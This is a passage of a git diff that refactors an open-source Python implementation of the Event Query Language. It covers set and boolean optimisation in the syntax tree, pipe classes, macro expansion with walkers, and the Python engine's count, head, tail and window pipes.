intersection between two sets for boolean OR.""" + """Perform an intersection between two sets for boolean AND.""" if isinstance(other, InSet) and self.expression == other.expression: if self.is_literal() and other.is_literal(): container1 = self._get_literals() container2 = other._get_literals() - intersection = [v for k, v in container1.items() if k in container2] - return InSet(self.expression, intersection).optimize() + reduced = [v for k, v in container1.items() if k in container2] + return InSet(self.expression, reduced).optimize() + + elif isinstance(other, Not): + if isinstance(other.term, InSet) and self.expression == other.term.expression: + # Check if one set is being subtracted from another + if self.is_literal() and other.term.is_literal(): + container1 = self._get_literals() + container2 = other.term._get_literals() + + reduced = [v for k, v in container1.items() if k not in container2] + return InSet(self.expression, reduced).optimize() + + elif isinstance(other, Comparison) and other.comparator == Comparison.EQ and self.expression == other.left: + if self.is_literal() and isinstance(other.right, Literal): + return super(InSet, self).__and__(InSet(other.left, [other.right])).optimize() + + elif isinstance(other, Comparison) and other.comparator == Comparison.NE and self.expression == other.left: + if self.is_literal() and isinstance(other.right, Literal): + return super(InSet, self).__and__(~ InSet(other.left, [other.right])).optimize() return super(InSet, self).__and__(other) @@ -592,6 +612,10 @@ def __or__(self, other): union = [v for v in container.values()] return InSet(self.expression, union).optimize() + elif isinstance(other, Comparison) and self.expression == other.left: + if self.is_literal() and isinstance(other.right, Literal): + return super(InSet, self).__or__(InSet(other.left, [other.right])) + return super(InSet, self).__or__(other) def split_literals(self): @@ -694,13 +718,25 @@ def __init__(self, term): """ self.term = term + def demorgans(self): + """Apply DeMorgan's law.""" + if isinstance(self, Or): + return And([~ t for t in self.terms]).optimize() + + elif isinstance(self, And): + return Or([~ t for t in self.terms]).optimize() + + else: + return ~ self.term.optimize() + def optimize(self): """Optimize NOT terms, by flattening them.""" - return ~ self.term.optimize() + optimized_term = self.term.optimize() + return ~ optimized_term def __invert__(self): """Convert ``not not X`` to X.""" - return self.term + return self.term.optimize() def render(self, precedence=None): """Convert wildcard functions back to the short hand syntax.""" @@ -719,10 +755,18 @@ class And(BaseCompound): def optimize(self): """Optimize AND terms, by flattening them.""" - node = self.terms[0] + terms = [] + current = self.terms[0] for term in self.terms[1:]: - node &= term - return node + current = current & term + if isinstance(current, And): + terms.extend(current.terms[:-1]) + current = current.terms[-1] + + if terms: + terms.append(current) + return And(terms) + return current def __and__(self, other): """Flatten multiple ``and`` terms.""" @@ -742,10 +786,18 @@ class Or(BaseCompound): def optimize(self): """Optimize OR terms, by flattening them.""" - node = self.terms[0] + terms = [] + current = self.terms[0] for term in self.terms[1:]: - node |= term - return node + current = current | term + if isinstance(current, Or): + terms.extend(current.terms[:-1]) + current = current.terms[-1] + + if terms: + terms.append(current) + return Or(terms) + return current def __or__(self, other): """Flatten multiple ``or`` terms.""" @@ -879,161 +931,39 @@ def _render(self): # noinspection PyAbstractClass -class PipeCommand(EqlNode): +class PipeCommand(EqlNode, SignatureMixin): """Base class for an EQL pipe.""" __slots__ = 'arguments', - pipe_name = None # type: str + name = None # type: str lookup = {} # type: dict[str, PipeCommand|type] - minimum_args = None - maximum_args = None def __init__(self, arguments=None): # type: (list[Expression]) -> None """Create a pipe with optional arguments.""" self.arguments = arguments or [] super(PipeCommand, self).__init__() - def validate(self): - """Find the first invalid argument. Return None if all are valid.""" - pass - @classmethod def register(cls, name): """Register a pipe class by name.""" def decorator(pipe_class): - pipe_class.pipe_name = name + pipe_class.name = name if name in cls.lookup: raise KeyError("Pipe {} already registered as {}".format(cls.lookup[name], name)) cls.lookup[name] = pipe_class return pipe_class return decorator - def _render(self): - if len(self.arguments) == 0: - return self.pipe_name - return self.pipe_name + ' ' + ', '.join(arg.render() for arg in self.arguments) - - -class ByPipe(PipeCommand): - """Pipe that takes a value (field, function, etc.) as a key.""" - - minimum_args = 1 - - def validate(self): - """Find the first invalid argument. Return None if all are valid.""" - for i, arg in enumerate(self.arguments): - if isinstance(arg, Literal) or isinstance(arg, NamedSubquery): - return i - - -@PipeCommand.register('head') -class HeadPipe(PipeCommand): - """Node representing the head pipe, analogous to the unix head command.""" - - maximum_args = 1 - DEFAULT = 50 - - @property - def count(self): # type: () -> int - """Get the number of elements to emit.""" - if len(self.arguments) == 0: - return self.DEFAULT - return self.arguments[0].value - - def validate(self): - """Find the first invalid argument. Return None if all are valid.""" - if len(self.arguments) > 0: - arg = self.arguments[0] - if not (isinstance(arg, Literal) and isinstance(arg.value, int) and arg.value > 0): - return 0 - - -@PipeCommand.register('tail') -class TailPipe(PipeCommand): - """Node representing the tail pipe, analogous to the unix tail command.""" - - maximum_args = 1 - DEFAULT = 50 - - @property - def count(self): # type: () -> int - """Get the number of elements to emit.""" - if len(self.arguments) == 0: - return self.DEFAULT - return self.arguments[0].value + @classmethod + def output_schemas(cls, arguments, type_hints, event_schemas): + # type: (list, list, list[Schema]) -> list[Schema] + """Output a list of schemas for each event in the pipe.""" + return event_schemas - def validate(self): - """Find the first invalid argument. Return None if all are valid.""" + def _render(self): if len(self.arguments) == 0: - return - elif len(self.arguments) > 1: - return 1 - else: - arg = self.arguments[0] - if not (isinstance(arg, Literal) and isinstance(arg.value, int)) or arg.value <= 0: - return 0 - - -@PipeCommand.register('sort') -class SortPipe(ByPipe): - """Sorts the pipes by field comparisons.""" - - -@PipeCommand.register('unique') -class UniquePipe(ByPipe): - """Filters events on a per-field basis, and only outputs the first event seen for a field.""" - - -@PipeCommand.register('count') -class CountPipe(ByPipe): - """Counts number of events that match a field, or total number of events if none specified.""" - - minimum_args = 0 - - -@PipeCommand.register('filter') -class FilterPipe(PipeCommand): - """Takes data coming into an existing pipe and filters it further.""" - - minimum_args = 1 - maximum_args = 1 - - @property - def expression(self): - """Get the filter expression.""" - return self.arguments[0] - - def validate(self): - """Validate that exactly one expression is sent.""" - if not isinstance(self.expression, Expression): - return 0 - - -@PipeCommand.register('unique_count') -@PipeCommand.register('ucount') -class UniqueCountPipe(ByPipe): - """Returns unique results but adds a count field.""" - - -@PipeCommand.register('window') -class WindowPipe(ByPipe): - """Maintains a time window buffer for streaming events.""" - - _timespan = None - - minimum_args = 1 - maximum_args = 1 - - @property - def timespan(self): - # cache timerange conversion - if not self._timespan: - self._timespan = TimeRange.convert(self.arguments[0]) - return self._timespan - - def validate(self): - if not self.timespan or self.timespan.delta < datetime.timedelta(0): - return 0 + return self.name + return self.name + ' ' + ', '.join(arg.render() for arg in self.arguments) class PipedQuery(EqlNode): @@ -1058,17 +988,15 @@ def _render(self): class EqlAnalytic(EqlNode): """Analytics are the top-level nodes for matching and returning events.""" - __slots__ = 'query', 'actions', 'metadata' + __slots__ = 'query', 'metadata' - def __init__(self, query, actions=None, metadata=None): + def __init__(self, query, metadata=None): """Init. :param PipedQuery query: Analytic query - :param list[str] actions: List of actions for the query :param dict metadata: Metadata for the analytic """ self.query = query - self.actions = actions self.metadata = metadata or {} @property @@ -1081,16 +1009,16 @@ def name(self): """Return the name from metadata.""" return self.metadata.get('name') - def __str__(self): + def __unicode__(self): """Print a string instead of the dictionary that render returns.""" - return self.__repr__() + return self.query.__unicode__() - def __unicode__(self): + def __str__(self): """Print a string instead of the dictionary that render returns.""" - return self.__repr__() + return self.query.__str__() def _render(self): - return {'metadata': self.metadata, 'actions': self.actions, 'query': self.query.render()} + return {'metadata': self.metadata, 'query': self.query.render()} class Definition(object): @@ -1122,7 +1050,7 @@ def __init__(self, name, value): # type: (str, Literal) -> None class BaseMacro(Definition): """Base macro class.""" - def expand(self, arguments, walker=None, optimize=True): + def expand(self, arguments): """Expand a macro with a set of arguments.""" raise NotImplementedError @@ -1134,17 +1062,15 @@ def __init__(self, name, callback): """Python macro to allow for more dynamic or sophisticated macros. :param str name: The name of the macro. - :param (list[EqlNode], AstWalker) -> EqlNode callback: A callback to expand out the macro. + :param (list[EqlNode]) -> EqlNode callback: A callback to expand out the macro. """ super(CustomMacro, self).__init__(name) self.callback = callback - def expand(self, arguments, walker=None, optimize=True): + def expand(self, arguments): """Make the callback do the dirty work for expanding the AST.""" - node = self.callback(arguments, walker) - if optimize: - return node.optimize() - return node + node = self.callback(arguments) + return node.optimize() @classmethod def from_name(cls, name): @@ -1168,15 +1094,16 @@ def __init__(self, name, parameters, expression): :param list[str]: The names of the parameters. :param Expression expression: The parameterized expression to return. """ - super(Macro, self).__init__(name) + BaseMacro.__init__(self, name) + EqlNode.__init__(self) self.parameters = parameters self.expression = expression - def expand(self, arguments, walker=None, optimize=True): + def expand(self, arguments): """Expand a node. :param list[BaseNode node] arguments: The arguments the macro is called with - :param AstWalker walker: An optional syntax tree walker. + :param Walker walker: An optional syntax tree walker. :param bool optimize: Return an optimized copy of the AST :rtype: BaseNode """ @@ -1185,17 +1112,15 @@ def expand(self, arguments, walker=None, optimize=True): self.name, len(self.parameters), len(arguments))) lookup = dict(zip(self.parameters, arguments)) - walker = walker or AstWalker() - def expand_variables(node, _): - """Callback for walking the AST that expands the variables into the passed in expression.""" - if isinstance(node, Field): - if node.base in lookup and not node.path: - node = walker.copy(lookup[node.base]) + def _walk_field(node): + if node.base in lookup and not node.path: + return lookup[node.base].optimize() return node - expanded = walker.transform(self.expression, expand_variables, optimize=optimize) - return expanded + walker = RecursiveWalker() + walker.register_func(Field, _walk_field) + return walker.walk(self.expression).optimize() def _render(self): expr = self.expression.render() @@ -1205,14 +1130,33 @@ def _render(self): return super(Macro, self)._render() -class PreProcessor(object): +class PreProcessor(ParserConfig): """An EQL preprocessor stores definitions and is used for macro expansion and constants.""" def __init__(self, definitions=None): """Initialize a preprocessor environment that can load definitions.""" - self.walker = AstWalker() self.constants = OrderedDict() # type: dict[str, Constant] - self.macros = OrderedDict() # type: dict[str, BaseMacro] + self.macros = OrderedDict() # type: dict[str, BaseMacro|CustomMacro|Maco] + + class PreProcessorWalker(RecursiveWalker): + """Custom walker class for this preprocessor.""" + + preprocessor = self + + def _walk_field(self, node, *args, **kwargs): + if node.base in self.preprocessor.constants and not node.path: + return self.preprocessor.constants[node.base].value + return self._walk_base_node(node, *args, **kwargs) + + def _walk_function_call(self, node, *args, **kwargs): + if node.name in self.preprocessor.macros: + macro = self.preprocessor.macros[node.name] + arguments = [self.walk(arg, *args, **kwargs) for arg in node.arguments] + return macro.expand(arguments) + return self._walk_base_node(node, *args, **kwargs) + + self.walker_cls = PreProcessorWalker + ParserConfig.__init__(self, preprocessor=self) self.add_definitions(definitions or []) def add_definitions(self, definitions): @@ -1220,7 +1164,7 @@ def add_definitions(self, definitions): for definition in definitions: self.add_definition(definition) - def add_definition(self, definition): # type: (Definition) -> None + def add_definition(self, definition): # type: (BaseMacro|Constant) -> None """Add a named definition to the preprocessor.""" name = definition.name if isinstance(definition, BaseMacro): @@ -1232,27 +1176,17 @@ def add_definition(self, definition): # type: (Definition) -> None raise KeyError("Constant {} already defined".format(name)) self.constants[name] = definition - def expand(self, root, optimize=True): + def expand(self, root): """Expand the function calls that match registered macros. :param EqlNode root: The input node, macro, expression, etc. :param bool optimize: Toggle AST optimizations while expanding :rtype: EqlNode """ - if not optimize and not self.constants and not self.macros: + if not self.constants and not self.macros: return root - def expand_callback(node, _): - if isinstance(node, FunctionCall): - if node.name in self.macros: - macro = self.macros[node.name] - expanded = macro.expand(node.arguments, self.walker, optimize=optimize) - node = expanded - elif isinstance(node, Field) and not node.path: - if node.base in self.constants: - node = self.constants[node.base].value - return node - return self.walker.transform(root, expand_callback, optimize=optimize) + return self.walker_cls().walk(root) def copy(self): """Create a shallow copy of a preprocessor.""" @@ -1260,3 +1194,7 @@ def copy(self): preprocessor.constants.update(self.constants) preprocessor.macros.update(self.macros) return preprocessor + + +# circular dependency +from .walkers import Walker, RecursiveWalker # noqa: E402 diff --git a/eql/engines/build.py b/eql/build.py similarity index 91% rename from eql/engines/build.py rename to eql/build.py index e04a16d..20baeb6 100644 --- a/eql/engines/build.py +++ b/eql/build.py @@ -1,11 +1,11 @@ """Entry point to project.""" -from __future__ import print_function +from __future__ import print_function, unicode_literals -from eql.ast import EqlAnalytic, PipedQuery -from eql.engines.native import PythonEngine -from eql.engines.base import TextEngine -from eql.parser import parse_analytic, parse_query -from eql.utils import is_string +from .ast import EqlAnalytic, PipedQuery +from .engine import PythonEngine +from .transpilers import TextEngine +from .parser import parse_analytic, parse_query +from .utils import is_string, load_extensions def render_engine(analytics, engine_type, config=None, analytics_only=False): @@ -17,6 +17,9 @@ def render_engine(analytics, engine_type, config=None, analytics_only=False): :param boolean analytics_only: Render the analytics without the core engine code. :return str: Returns the base engine """ + load_extensions(force=False) + if engine_type not in TextEngine.extensions: + raise KeyError("Unable to translate to unknown extension {}.".format(engine_type)) engine_cls = TextEngine.extensions[engine_type] engine = engine_cls(config) diff --git a/eql/engines/native.py b/eql/engine.py similarity index 79% rename from eql/engines/native.py rename to eql/engine.py index 7cdca45..b89ccca 100644 --- a/eql/engines/native.py +++ b/eql/engine.py @@ -2,13 +2,16 @@ from __future__ import print_function import json -import re +import functools from collections import defaultdict, deque, OrderedDict, namedtuple -from eql.ast import * # noqa -from eql.engines.base import BaseEngine, BaseTranspiler, NodeMethods, Event, AnalyticOutput -from eql.schema import EVENT_TYPE_ANY, EVENT_TYPE_GENERIC -from eql.utils import is_string, is_number, get_type_converter, to_unicode +from .ast import * # noqa: F403 +from .errors import EqlCompileError +from .pipes import * # noqa: F403 +from .transpilers import BaseEngine, BaseTranspiler +from .events import Event, AnalyticOutput +from .schema import EVENT_TYPE_ANY, EVENT_TYPE_GENERIC +from .utils import is_string, is_array, is_number, get_type_converter PIPE_EOF = object() @@ -33,11 +36,6 @@ def call(self, fn, *args): class PythonEngine(BaseEngine, BaseTranspiler): """Converter from EQL to Python callbacks.""" - converters = NodeMethods() - pipes = NodeMethods() - reducers = NodeMethods() - special_functions = NodeMethods() - def __init__(self, config=None): """Create a python engine for EQL.""" super(PythonEngine, self).__init__(config) @@ -56,37 +54,14 @@ def __init__(self, config=None): if self.get_config('data_source') == 'endgame': self.process_subtype = "opcode" - self.create_values = (1, 3) + self.create_values = (1, 3, 9) self.terminate_values = (2, 4) else: self.process_subtype = "subtype" - self.create_values = ["create"] + self.create_values = ["create", "fork"] self.terminate_values = ["terminate"] - self.add_custom_function('length', self._length) - self.add_custom_function('arrayContains', self._array_contains) - self.add_custom_function('safe', self._convert_safe_callback) - - # String functions - self.add_custom_function('match', self._match) - self.add_custom_function('matchLite', self._match) - self.add_custom_function('startsWith', self._str_starts_with) - self.add_custom_function('endsWith', self._str_ends_width) - self.add_custom_function('stringContains', self._str_contains) - self.add_custom_function('indexOf', self._str_index_of) - self.add_custom_function('substring', self._str_substring) - self.add_custom_function('string', to_unicode) - self.add_custom_function('concat', self._concat) - self.add_custom_function('number', self._number) - - # Math functions - self.add_custom_function('add', self._add) - self.add_custom_function('subtract', self._subtract) - self.add_custom_function('multiply', self._multiply) - self.add_custom_function('divide', self._divide) - self.add_custom_function('modulo', self._modulo) - - self._scoped = list() + self._scoped = [] for name, fn in self.get_config('functions', {}).items(): self.add_custom_function(name, fn) @@ -101,100 +76,6 @@ def __init__(self, config=None): else: self._default_emitter = self.get_result_emitter() - @staticmethod - def _length(value): - if value is None: - return 0 - else: - return len(value) - - @staticmethod - def _match(pattern, value): - return value is not None and re.match(pattern, value, re.IGNORECASE) is not None - - @staticmethod - def _str_starts_with(a, b): # type: (str, str) -> bool - return is_string(a) and is_string(b) and a.lower().startswith(b.lower()) - - @staticmethod - def _str_ends_width(a, b): # type: (str, str) -> bool - return is_string(a) and is_string(b) and a.lower().endswith(b.lower()) - - @staticmethod - def _str_contains(a, b): # type: (str, str) -> bool - return is_string(a) and is_string(b) and b.lower() in a.lower() - - @staticmethod - def _str_index_of(a, b, start=0): # type: (str, str, int) -> int - if is_string(a) and is_string(b): - a = a.lower() - b = b.lower() - if b in a[start:]: - return a.index(b, start) - - @staticmethod - def _add(a, b): # type: (int|float, int|float) -> (int|float) - return (a or 0) + (b or 0) - - @staticmethod - def _subtract(a, b): # type: (int|float, int|float) -> (int|float) - return (a or 0) - (b or 0) - - @staticmethod - def _divide(a, b): # type: (int|float, int|float) -> (int|float) - if not b: - return float('NaN') - return (a or 0) / b - - @staticmethod - def _multiply(a, b): # type: (int|float, int|float) -> (int|float) - return (a or 0) * (b or 0) - - @staticmethod - def _modulo(a, b): # type: (int|float, int|float) -> (int|float) - if not b: - return float('NaN') - return (a or 0) % b - - @staticmethod - def _str_substring(a, start=None, end=None): # type: (str, int, int) -> str - if is_string(a): - return a[start:end] - - @staticmethod - def _concat(*args): - return u"".join(to_unicode(arg) for arg in args) - - @staticmethod - def _number(arg, base=10): # type: (str, int) -> int|float - if is_number(arg): - return arg - elif is_string(arg): - if '.' in arg: - return float(arg) - if arg.startswith('0x'): - arg = arg[2:] - base = 16 - try: - return int(arg, base) - except ValueError: - return None - - @staticmethod - def _array_contains(array, value): - if array is None: - return False - - if is_string(value): - value = value.lower() - - for item in array: - if item == value: - return True - elif is_string(item) and item.lower() == value: - return True - return False - def print_event(self, event): # type: (Event) -> None """Print an event to stdout.""" print(json.dumps(event.data, sort_keys=True)) @@ -240,7 +121,7 @@ def output_results(events): # type: (list[Event]) -> None else: return output_results - def convert(self, node, piped=False, scoped=False): + def convert(self, node, *args, **kwargs): """Convert an eql AST to a python callback function. :param EqlNode node: The eql AST @@ -249,21 +130,40 @@ def convert(self, node, piped=False, scoped=False): :return A python callback function that takes an event. :rtype: (Event|Scope|list[Event]) -> object """ - cb = PythonEngine.converters(self, node) + piped = kwargs.pop("piped", False) + scoped = kwargs.pop("scoped", False) + method = self.get_node_method(node, "_convert_") + + if not method: + raise EqlCompileError(u"Unable to convert {}".format(node)) + + cb = method(node, *args, **kwargs) + if not scoped: return cb elif piped: + @functools.wraps(cb) def wrapped(events): return cb(Scope(events, [])) return wrapped else: + @functools.wraps(cb) def wrapped(event): return cb(Scope([event], [])) return wrapped - def _convert_key(self, args, scoped=True, piped=False): + @classmethod + def _remove_case(cls, key): + if is_string(key): + return key.lower() + elif is_array(key): + return tuple(cls._remove_case(k) for k in key) + else: + return key + + def _convert_key(self, args, scoped=True, piped=False, insensitive=True): """Convert a tuple of AST nodes to a callback function that returns a key. :param list[Event] args: @@ -271,18 +171,23 @@ def _convert_key(self, args, scoped=True, piped=False): :param bool scoped: Wrap the callback with variable scoping :rtype: (Scope|Event|list[Event]) -> tuple[object] """ + remove_case = self._remove_case + if len(args) == 0: return lambda e: None elif len(args) == 1: - return self.convert(args[0], scoped=scoped, piped=piped) + callback = self.convert(args[0], scoped=scoped, piped=piped) + if insensitive: + return lambda e: remove_case(callback(e)) + return callback callbacks = [self.convert(arg, scoped=scoped, piped=piped) for arg in args] - def to_tuple_callback(value): - return tuple(callback(value) for callback in callbacks) - - return to_tuple_callback + if insensitive: + return lambda e: tuple(remove_case(cb(e)) for cb in callbacks) + else: + return lambda e: tuple(cb(e) for cb in callbacks) def _convert_tuple(self, args): """Convert a tuple of AST nodes to a callback function that returns a tuple of values. @@ -308,7 +213,7 @@ def convert_pipe(self, node, next_pipe): :param (list[eql.engines.base.Event]) -> None next_pipe: An already converted pipe :rtype: (list[eql.engines.base.Event]) -> None """ - return self.pipes(self, node, next_pipe) + return self.convert(node, next_pipe) def convert_reducer(self, node, next_pipe): """Convert an EQL reducer into a callback function. @@ -317,10 +222,10 @@ def convert_reducer(self, node, next_pipe): :param (list[eql.engines.base.Event]) -> None next_pipe: An already converted reducer :rtype: (list[eql.engines.base.Event]) -> None """ - return self.reducers(self, node, next_pipe) + method = self.get_node_method(node, "_reduce_") or self.get_node_method(node, "_convert_") + return method(node, next_pipe) - @converters.add(Not) - def _negate(self, node): # type: (Not) -> callable + def _convert_not(self, node): # type: (Not) -> callable get_value = self.convert(node.term) def negate(scope): # type: (Scope) -> bool @@ -328,24 +233,22 @@ def negate(scope): # type: (Scope) -> bool return negate - @converters.add(Literal) - @converters.add(String) - @converters.add(Boolean) - @converters.add(Null) - @converters.add(Number) - def _get_value(self, node): # type: (Literal) -> callable + def _convert_literal(self, node): # type: (Literal) -> callable literal_value = node.value return lambda scope: literal_value - @converters.add(Field) - def _get_field(self, node): # type: (Field) -> callable + def _convert_field(self, node): # type: (Field) -> callable def walk_path(value): for key in node.path: if value is None: break + elif is_string(value) and is_string(key): + # expand subtype.create -> subtype == "create" + # if there's a string field called "subtype" + value = (value == key) elif isinstance(value, dict): value = value.get(key) - elif key < len(value): + elif isinstance(key, int) and is_array(value) and key < len(value): value = value[key] else: return @@ -381,15 +284,11 @@ def query_event_callback(scope): # type: (Scope) -> object return query_event_callback - @staticmethod - def _is_name(node): # type: (EqlNode) -> bool - return isinstance(node, Field) and not node.path - def _create_custom_callback(self, arguments, body): """Convert an EQL callback with named arguments. :param list[Field] arguments: List of named arguments for the callback function - :param Expression arguments: List of named arguments for the callback function + :param Expression body: List of named arguments for the callback function :rtype: (Scope, object) -> object """ names = [arg.base for arg in arguments] @@ -401,39 +300,38 @@ def _create_custom_callback(self, arguments, body): return callback - @special_functions.add('safe') - def _convert_safe_callback(self, arguments): + def _function_safe(self, arguments): get_value = self.convert(arguments[0]) def callback(scope): try: return get_value(scope) - except: + except Exception: pass return callback - @special_functions.add('wildcard') - def _convert_wildcard(self, arguments): - patterns = [] - for literal in arguments[1:]: - regex = re.escape(literal.value.lower()) - regex = "^" + regex.replace('\\*', '.*?') + "$" - patterns.append(regex) - - compound = re.compile('|'.join(patterns), re.I) - get_source = self.convert(arguments[0]) - - def check_match(scope): - text = get_source(scope) - return text is not None and compound.match(text) is not None + def _function_array_count(self, arguments): + node = FunctionCall('arrayCount', arguments) + if len(arguments) == 3 and self.is_variable(arguments[1]): + array, name, body = arguments + get_array = self.convert(array) + callback = self._create_custom_callback([name], body) - return check_match + def walk_array(scope): # type: (Scope) -> bool + array = get_array(scope) + count = 0 + if isinstance(array, list): + for item in array: + if scope.call(callback, item): + count = count + 1 + return count + return walk_array + raise TypeError(u"Invalid signature {}".format(node)) - @special_functions.add('arraySearch') - def _convert_array_search(self, arguments): + def _function_array_search(self, arguments): node = FunctionCall('arraySearch', arguments) - if len(arguments) == 3 and self._is_name(arguments[1]): + if len(arguments) == 3 and self.is_variable(arguments[1]): array, name, body = arguments get_array = self.convert(array) callback = self._create_custom_callback([name], body) @@ -445,18 +343,25 @@ def walk_array(scope): # type: (Scope) -> bool if scope.call(callback, item): return True return False - return walk_array raise TypeError(u"Invalid signature {}".format(node)) - @converters.add(FunctionCall) - def _get_function_call(self, node): # type: (FunctionCall) -> callable + def _convert_function_call(self, node): # type: (FunctionCall) -> callable name = node.name - if name in self.special_functions: - unbound = self.special_functions[node.name] - return unbound(self, node.arguments) + method = getattr(self, "_function_{}".format(self.camelized(name)), None) + if method: + return method(node.arguments) + + # if a function isn't found, pull a specific callback in from the function registry + func = self._functions.get(node.name, node.signature) + + # if it's a function signature, then get the methods + if hasattr(func, "get_callback"): + func = func.get_callback(*node.arguments) + + if not callable(func): + raise KeyError("Unknown function {}".format(node.name)) - func = self._functions[node.name] get_arguments = self._convert_tuple(node.arguments) def wrapped_function(scope): # type: (Scope) -> bool @@ -464,8 +369,7 @@ def wrapped_function(scope): # type: (Scope) -> bool return wrapped_function - @converters.add(InSet) - def _check_in_set(self, node): # type: (InSet) -> callable + def _convert_in_set(self, node): # type: (InSet) -> callable if all(isinstance(item, Literal) for item in node.container): values = set() for item in node.container: @@ -488,8 +392,7 @@ def callback(scope): # type: (Scope) -> bool else: return self.convert(node.synonym) - @converters.add(Comparison) - def _compare(self, node): # type: (Comparison) -> callable + def _convert_comparison(self, node): # type: (Comparison) -> callable get_left = self.convert(node.left) get_right = self.convert(node.right) @@ -536,7 +439,6 @@ def callback(scope): # type: (Scope) -> bool return callback - @converters.add(And) def _convert_and(self, node): # type: (CompoundTerm) -> callable get_terms = [self.convert(term) for term in node.terms] @@ -545,7 +447,6 @@ def and_terms(scope): # type: (Scope) -> bool return and_terms - @converters.add(Or) def _convert_or(self, node): # type: (CompoundTerm) -> callable get_terms = [self.convert(term) for term in node.terms] @@ -554,51 +455,80 @@ def or_terms(scope): # type: (Scope) -> bool return or_terms - @pipes.add(CountPipe) def _convert_count_pipe(self, node, next_pipe): # type: (CountPipe, callable) -> callable + host_key = self.host_key if len(node.arguments) == 0: # Counting only the total - summary = {'count': 0} + summary = {'key': 'totals', 'count': 0} + + # mutable scoped variable + hosts = [set()] def count_total_callback(events): if events is PIPE_EOF: - # event must be immutable, as the counter will be reset - event = {'key': 'totals', 'count': summary['count']} + # immutable version of summary + event = summary.copy() + + if len(hosts[0]): + event['total_hosts'] = len(hosts[0]) + event['hosts'] = list(sorted(hosts[0])) + next_pipe([Event(EVENT_TYPE_GENERIC, 0, event)]) - summary['count'] = 0 next_pipe(PIPE_EOF) + + # reset state + summary['count'] = 0 + if len(hosts[0]): + del summary['hosts'] + del summary['total_hosts'] + hosts[0] = set() else: summary['count'] += 1 + if host_key in events[0].data: + hosts[0].add(events[0].data[host_key]) return count_total_callback else: - get_key = self._convert_key(node.arguments, scoped=True, piped=True) - count_table = defaultdict(lambda: {'count': 0}) + get_key = self._convert_key(node.arguments, scoped=True, piped=True, insensitive=False) + # we want to aggregate counts for keys insensitively, but need to keep the case of the first one we see + key_lookup = {} + count_table = defaultdict(lambda: {'count': 0, 'hosts': set()}) + remove_case = self._remove_case def count_tuple_callback(events): # type: (list[Event]) -> None if events is PIPE_EOF: # This may seem a little tricky, but we need to effectively learn the type(s) to perform comparison # Python 3 doesn't allow you to use a key function that returns various types - converter = get_type_converter(count_table) - converted_count_table = {converter(k): v for k, v in count_table.items()} - total = sum(tbl['count'] for tbl in count_table.values()) + case_sensitive_table = {key_lookup[k]: v for k, v in count_table.items()} + converter = get_type_converter(case_sensitive_table) + converted_count_table = {converter(k): v for k, v in case_sensitive_table.items()} + total = sum(tbl['count'] for tbl in converted_count_table.values()) for key, details in sorted(converted_count_table.items(), key=lambda kv: (kv[1]['count'], kv[0])): + hosts = details.pop('hosts') + if len(hosts): + details['hosts'] = list(sorted(hosts)) + details['total_hosts'] = len(hosts) + details['key'] = key details['percent'] = float(details['count']) / total next_pipe([Event(EVENT_TYPE_GENERIC, 0, details)]) - count_table.clear() next_pipe(PIPE_EOF) + + # reset state + count_table.clear() else: key = get_key(events) + insensitive_key = remove_case(key) + key_lookup.setdefault(insensitive_key, key) - count_table[key]['count'] += 1 + count_table[insensitive_key]['count'] += 1 + if host_key in events[0].data: + count_table[insensitive_key]['hosts'].add(events[0].data[host_key]) return count_tuple_callback - @pipes.add(FilterPipe) - @reducers.add(FilterPipe) def _convert_filter_pipe(self, node, next_pipe): # type: (FilterPipe, callable) -> callable check_filter = self.convert(node.expression, piped=True, scoped=True) @@ -610,27 +540,24 @@ def filter_callback(events): # type: (list[Event]) -> None return filter_callback - @pipes.add(HeadPipe) - @reducers.add(HeadPipe) def _convert_head_pipe(self, node, next_pipe): # type: (HeadPipe, callable) -> callable - totals = [0] # has to be mutable because of python scoping + output_buffer = [] max_count = node.count def head_callback(events): - if totals[0] < max_count: - if events is PIPE_EOF: - totals[0] = 0 - next_pipe(PIPE_EOF) - else: - totals[0] += 1 - next_pipe(events) - if totals[0] == max_count: - next_pipe(PIPE_EOF) + if events is PIPE_EOF: + for output in output_buffer: + next_pipe(output) + next_pipe(PIPE_EOF) + + # reset state + output_buffer.clear() + else: + if len(output_buffer) < max_count: + output_buffer.append(events) return head_callback - @pipes.add(TailPipe) - @reducers.add(TailPipe) def _convert_tail_pipe(self, node, next_pipe): # type: (TailPipe, callable) -> callable output_buffer = deque(maxlen=node.count) @@ -638,15 +565,15 @@ def tail_callback(events): if events is PIPE_EOF: for output in output_buffer: next_pipe(output) - output_buffer.clear() next_pipe(PIPE_EOF) + + # reset state + output_buffer.clear() else: output_buffer.append(events) return tail_callback - @pipes.add(SortPipe) - @reducers.add(SortPipe) def _convert_sort_pipe(self, node, next_pipe): # type: (SortPipe, callable) -> callable output_buffer = [] sort_key = self._convert_key(node.arguments, scoped=True, piped=True) @@ -661,23 +588,25 @@ def get_converted_key(buffer_events): output_buffer.sort(key=get_converted_key) for output in output_buffer: next_pipe(output) - output_buffer.clear() next_pipe(PIPE_EOF) + + # reset state + output_buffer.clear() else: output_buffer.append(events) return sort_callback - @pipes.add(UniquePipe) - @reducers.add(UniquePipe) def _convert_unique_pipe(self, node, next_pipe): # type: (UniquePipe, callable) -> callable seen = set() get_unique_key = self._convert_key(node.arguments, scoped=True, piped=True) def unique_callback(events): if events is PIPE_EOF: - seen.clear() next_pipe(PIPE_EOF) + + # reset state + seen.clear() else: key = get_unique_key(events) if key not in seen: @@ -686,17 +615,17 @@ def unique_callback(events): return unique_callback - @pipes.add(WindowPipe) - @reducers.add(WindowPipe) - def _aggregate_time_window_pipe(self, node, next_pipe): # type: (WindowPipe, callable) -> callable - """Maintains a buffer of events in a specified time window and forwards all events in the buffer.""" - - window_buf = deque() # tuple of (timestamp, events) + def _convert_window_pipe(self, node, next_pipe): # type: (WindowPipe) -> callable + """Aggregate events over a sliding window using a buffer.""" + window_buf = deque() # tuple of (timestamp, events) timespan = self.convert(node.timespan) def time_window_callback(events): # type: (list[Event]) -> None if events is PIPE_EOF: next_pipe(PIPE_EOF) + + # reset state + window_buf.clear() else: minimum_start = events[0].time - timespan @@ -706,18 +635,15 @@ def time_window_callback(events): # type: (list[Event]) -> None window_buf.append((events[0].time, events)) - # forward the entire buffer along the pipe, reversed so that events[0] exposes new information for - # unique pipe etc - for result in reversed(window_buf): + for result in window_buf: next_pipe(result[1]) next_pipe(PIPE_EOF) return time_window_callback - @pipes.add(UniqueCountPipe) - @reducers.add(UniqueCountPipe) - def _aggregate_unique_counts(self, node, next_pipe): # type: (CountPipe) -> callable + def _convert_unique_count_pipe(self, node, next_pipe): # type: (CountPipe) -> callable """Aggregate counts coming into the pipe.""" + 